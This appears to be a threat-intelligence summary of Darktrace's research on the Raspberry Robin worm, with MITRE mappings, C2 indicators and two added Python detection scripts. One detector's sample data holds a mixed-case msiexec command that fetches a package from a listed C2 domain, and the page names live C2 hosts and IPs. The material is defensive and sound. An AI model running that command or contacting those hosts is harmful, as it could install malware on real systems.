The Early Bird Catches the Worm: Darktrace’s Hunt for Raspberry Robin | Darktrace Blog

Darktrace investigated Raspberry Robin, a USB-spread worm that uses malicious .LNK files, msiexec, and short-TLD C2 domains to download MSI packages containing DLLs that enable lateral movement, persistence, and data exfiltration. The campaign leverages compromised IoT devices (including QNAP NAS), TOR exit nodes, and one-day local privilege-escalation exploits to broaden access and deliver additional malware. #RaspberryRobin #QNAP

Keypoints

  • Initial access is commonly via infected USB drives containing malicious .LNK files that execute cmd.exe and msiexec to fetch the main payload.
  • Compromised hosts make HTTP GET requests (often on port 8080) with the user-agent “Windows Installer” to short, low-character C2 domains (e.g., .rocks, .pm, .wf) to download MSI packages.
  • Downloaded MSI packages drop protected malicious DLLs that enable payload download, lateral movement, persistence, privilege escalation, and device information exfiltration.
  • Operators use compromised IoT devices (notably QNAP NAS with hijacked DNS) and TOR exit nodes as C2 infrastructure backups, and have been observed using signed executables for DLL side-loading via messaging attachments (Discord).
  • Raspberry Robin has incorporated one-day local privilege-escalation exploits and advanced evasion (sandbox detection, mixed-case commands) to improve persistence and avoid signature-based detection.
  • Darktrace DETECT consistently identified anomalies (new user-agent, new IP, suspicious request data, uncommon TOR usage) across 2022 and 2023 investigations; RESPOND could autonomously block C2 connections and enforce a device’s normal pattern of life to contain infections.
  • The worm acts as an access broker, distributing additional payloads (e.g., FakeUpdates, Vidar-related binaries) and facilitating follow-on activity by other malware families and threat actors.

MITRE Techniques

  • [T1204.002] User Execution: Malicious Link – LNK shortcut on USB triggers execution: (‘When clicked, the LNK file automatically launches cmd.exe to execute the malicious file stored on the external drive’).
  • [T1218.011] Signed Binary Proxy Execution: Msiexec – msiexec is used to retrieve payloads from C2: (‘msiexec.exe to connect to a Raspberry Robin command-and-control (C2) endpoint and download the main malware component’).
  • [T1071.001] Application Layer Protocol: Web Protocols (HTTP) – C2 communications use HTTP GET over port 8080: (‘making HTTP GET connections via the unusual port 8080 to Raspberry Robin C2 endpoints using the new user agent “Windows Installer”’).
  • [T1571] Non-Standard Port – Use of port 8080 instead of standard port 80 for C2 traffic: (‘unusual port 8080 for the HTTP protocol’).
  • [T1574.001] Hijack Execution Flow: DLL Side-Loading – Attackers deliver a signed executable with a malicious DLL for side-loading via Discord attachments: (‘a legitimate and signed Windows executable… alongside a malicious dynamic-link library (DLL) containing a Raspberry Robin sample’).
  • [T1090.003] Proxy: TOR – TOR exit nodes employed as backup C2 infrastructure: (‘utilizing TOR exit nodes as backup C2 infrastructure, with compromised devices detected connecting to TOR endpoints’).
  • [T1068] Exploitation for Privilege Escalation – Operators leverage recently disclosed local privilege-escalation exploits to increase persistence and movement: (‘utilizes several local privilege escalation exploits that had been recently disclosed’).
  • [T1210] Exploitation of Remote Services (Lateral Movement) – The DLL enables lateral movement and exploitation of services across the network to propagate payloads: (‘download further payloads and enable lateral movement, persistence and privilege escalation on compromised devices’).
  • [T1041] Exfiltration Over C2 Channel – Compromised devices send host and credential data to C2: (‘making C2 connections that contained sensitive device information, including hostnames and credentials’).
  • [T1001] Data Obfuscation – The malware uses deception (fake payloads in sandboxes, mixed-case commands) to hinder analysis and evade signatures: (‘dropping a fake payload when analyzed in a sandboxed environment and using mixed-case executing commands’).
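The Keypoints and the T1204.002 / T1218.011 entries above describe one endpoint chain: a .LNK on the USB drive launches cmd.exe, which runs a file on the drive, which in turn starts msiexec to pull the MSI from C2, with mixed-case command lines used to dodge signatures. The following is an added example, not code from the Darktrace post, showing how a defender can detect that chain in process-creation telemetry. The event fields are modelled on Sysmon Event ID 1 but the events themselves, the drive letter E: and the file path on it are constructed; the C2 hostname and port come from the post's own IoCs.

```python
"""Added example (not from the Darktrace post): flag the cmd.exe -> msiexec
remote-fetch chain in constructed process-creation events."""
import re
from pathlib import PureWindowsPath

# Any http(s) URL in a command line, matched case-insensitively so that
# mixed-case evasion ("hTtP://...") does not slip past the check.
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed events (pid, ppid, image, command line). The drive letter E:
# and the batch file on it are assumptions, the C2 host is from the post.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 101, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'cmd.exe /c "E:\launch.bat"'},                      # file stored on the USB drive
    {"pid": 102, "ppid": 101, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": "MsIeXeC.exe /Q /I hTtP://wak.rocks:8080/ab/cd"},   # mixed case, remote package
    {"pid": 200, "ppid": 1, "image": r"C:\Windows\System32\services.exe", "cmd": "services.exe"},
    {"pid": 201, "ppid": 200, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r'msiexec.exe /i "C:\Temp\vendor-agent.msi" /qn'},  # benign local install
]


def basename(path):
    """Case-folded file name of a Windows path (works on any host OS)."""
    return PureWindowsPath(path).name.casefold()


def is_oddly_cased(token):
    """True when a token is neither lower, UPPER nor Capitalized, e.g. 'MsIeXeC.exe'."""
    return token not in (token.lower(), token.upper(), token.capitalize())


def ancestors(event, by_pid):
    """Parent chain of an event, nearest parent first, guarded against pid reuse loops."""
    chain, seen = [], {event["pid"]}
    cur = by_pid.get(event["ppid"])
    while cur is not None and cur["pid"] not in seen:
        seen.add(cur["pid"])
        chain.append(cur)
        cur = by_pid.get(cur["ppid"])
    return chain


def detect_msiexec_chain(events, removable_drives=("E:",)):
    """Return findings for msiexec processes that fetch a remote package under cmd.exe.

    removable_drives is assumed to come from the host's removable-media inventory.
    """
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if basename(e["image"]) != "msiexec.exe":
            continue
        url = URL_RE.search(e["cmd"])
        if not url:
            continue  # local package install, not the remote fetch the post describes
        parents = ancestors(e, by_pid)
        cmd_parent = next((p for p in parents if basename(p["image"]) == "cmd.exe"), None)
        if cmd_parent is None:
            continue
        reasons = ["msiexec fetching a remote package", "launched under cmd.exe"]
        if any(d.casefold() in cmd_parent["cmd"].casefold() for d in removable_drives):
            reasons.append("cmd.exe command line references a removable drive")
        first_token = PureWindowsPath(e["cmd"].split()[0]).name
        if is_oddly_cased(first_token):
            reasons.append("mixed-case executable name in command line")
        findings.append({"pid": e["pid"], "url": url.group(0),
                         "chain": [p["pid"] for p in parents], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in detect_msiexec_chain(EVENTS):
        print(f)
```

The benign install at pid 201 is skipped because its package argument is a local path; the post's point is msiexec reaching out to a C2 endpoint, so the URL is the primary condition and the parent chain, removable-drive reference and odd casing are corroborating signals rather than filters.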

Indicators of Compromise

  • [Hostname / C2] observed C2 domains – vqdn[.]net, wak[.]rocks, and many others (e.g., m0[.]yt, o7car[.]com).
  • [IP address] likely C2 hosts – 59.15.11[.]49, 82.124.243[.]57 (additional listed IPs include 114.32.120[.]11 and 203.186.28[.]189).
  • [User-Agent] C2 fingerprint – “Windows Installer” used in HTTP GET requests to C2 endpoints.
  • [File / Payload] downloaded artifacts – MSI package (example observed from wak[.]rocks) that contained a protected malicious DLL; also numeric .exe drop associated with Vidar-like payloads.
  • [Infrastructure] compromised IoT devices abused as C2 – QNAP NAS devices (hijacked DNS) and other IoT devices (e.g., Cerio access point) used to host or proxy C2 activity.

This rewrite focuses on the technical procedure used by Raspberry Robin and omits non-technical background.

Raspberry Robin commonly gains initial access through infected removable media: an attached USB drive contains a malicious .LNK shortcut that launches cmd.exe to execute a payload on the drive, which then uses msiexec to contact a C2 endpoint and download an MSI package. Compromised hosts perform HTTP GET requests, often on port 8080, with the user-agent string “Windows Installer” to hostnames of only a few characters on TLDs like .rocks, .pm, and .wf; those MSI packages drop a protected malicious DLL responsible for fetching additional payloads and enabling lateral movement and persistence.

The DLL and follow-on components collect device metadata (hostnames, credentials), support privilege escalation via recently disclosed local exploits, and facilitate propagation across networks. Operators also abuse third-party infrastructure: compromised IoT devices such as QNAP NAS (with hijacked DNS) host payloads and act as C2; TOR exit nodes have been used as fallback C2 routes. Additional delivery techniques include side-loading via a signed executable paired with a malicious DLL distributed in archive attachments (observed via Discord).

Detection and containment hinge on early network-level anomalies: unusual msiexec outbound connections to rare endpoints, a new HTTP user-agent from internal devices, downloads of MSI packages from short, uncommon domains, and unexpected TOR connections. Darktrace flagged these via models for New User Agent, Suspicious Request Data, and Possible/Uncommon TOR Usage; with an autonomous response, blocking the C2 connection and enforcing the device’s learned “pattern of life” prevents the MSI/DLL download and stops lateral propagation.
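The two preceding paragraphs list the network-level traits that surfaced the infection (the “Windows Installer” user-agent, HTTP on port 8080, very short hostnames, MSI downloads) and the Indicators of Compromise section gives concrete hosts and IPs. The block below is an added example, not part of the Darktrace post and not Darktrace's detection logic: it scores constructed HTTP proxy log lines against those traits and against the page's IoCs. The log line format, the sample lines and the scoring weights are assumptions; the hostnames and IPs in the IoC sets are the page's own, re-fanged for matching.

```python
"""Added example (not from the Darktrace post): score outbound HTTP requests for the
Raspberry Robin C2 traits the post describes. Log format and sample lines are constructed."""
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

C2_USER_AGENT = "Windows Installer"   # user-agent the post attributes to the msiexec fetch
UNUSUAL_PORTS = {8080}                # HTTP on 8080 rather than 80

# IoCs as listed on the page, with the [.] defanging removed so they match hostnames.
KNOWN_C2_HOSTS = {"vqdn.net", "wak.rocks", "m0.yt", "o7car.com"}
KNOWN_C2_IPS = {"59.15.11.49", "82.124.243.57", "114.32.120.11", "203.186.28.189"}

# Weights are an assumption: the user-agent alone is normal for legitimate msiexec
# installs, so it only becomes interesting together with the other traits.
WEIGHTS = {"ua": 1, "port": 2, "short_host": 2, "msi": 1, "ioc": 5}

# Constructed log format: <ts> <src_ip> <method> <url> <status> ua="..."
LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3}) ua="(?P<ua>[^"]*)"$'
)

# Constructed sample lines; the first two reuse hostnames from the page's IoC list.
SAMPLE_LOG = [
    '2023-03-01T10:00:01Z 10.0.0.21 GET http://wak.rocks:8080/ab/cd.msi 200 ua="Windows Installer"',
    '2023-03-01T10:00:05Z 10.0.0.21 GET http://vqdn.net:8080/x/y 200 ua="Windows Installer"',
    '2023-03-01T10:01:00Z 10.0.0.22 GET https://www.microsoft.com/en-us/download/ 200 ua="Mozilla/5.0"',
    '2023-03-01T10:02:00Z 10.0.0.23 GET http://updates.example.com/patch.msi 200 ua="Windows Installer"',
    "not a log line",
]


@dataclass
class Verdict:
    src: str
    url: str
    score: int
    reasons: list


def parse_line(line):
    """Return the log fields as a dict, or None for lines that do not match the format."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def short_hostname(host):
    """Registered label of three or fewer characters (e.g. wak.rocks, m0.yt); IP literals excluded."""
    labels = host.split(".")
    if host.replace(".", "").isdigit():
        return False
    return len(labels) >= 2 and len(labels[-2]) <= 3


def score_request(rec):
    """Weighted score for one parsed request plus the human-readable reasons."""
    parts = urlsplit(rec["url"])
    host = parts.hostname or ""
    port = parts.port or (443 if parts.scheme == "https" else 80)
    score, reasons = 0, []
    if rec["ua"] == C2_USER_AGENT:
        score += WEIGHTS["ua"]; reasons.append("user-agent 'Windows Installer' on outbound HTTP")
    if port in UNUSUAL_PORTS:
        score += WEIGHTS["port"]; reasons.append(f"HTTP on non-standard port {port}")
    if short_hostname(host):
        score += WEIGHTS["short_host"]; reasons.append(f"short hostname {host}")
    if parts.path.lower().endswith(".msi"):
        score += WEIGHTS["msi"]; reasons.append("MSI package download")
    if host in KNOWN_C2_HOSTS or host in KNOWN_C2_IPS:
        score += WEIGHTS["ioc"]; reasons.append(f"known Raspberry Robin IoC {host}")
    return Verdict(rec["src"], rec["url"], score, reasons)


def triage(lines, threshold=3):
    """Parse, score and return the requests at or above the threshold, in log order."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        verdict = score_request(rec)
        if verdict.score >= threshold:
            hits.append(verdict)
    return hits


if __name__ == "__main__":
    for v in triage(SAMPLE_LOG):
        print(v.src, v.score, v.url, "; ".join(v.reasons))
```

The fourth sample line, a plain MSI download from an ordinary domain with the installer user-agent, stays below the threshold on purpose: that is what routine msiexec use looks like, and flagging it would bury the real hits. Darktrace's models add what a stateless scorer cannot, namely whether the user-agent, endpoint or port is new for that particular device, so in practice this kind of rule is a complement to per-device baselining rather than a replacement for it.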

Read more: https://darktrace.com/blog/the-early-bird-catches-the-worm-darktraces-hunt-for-raspberry-robin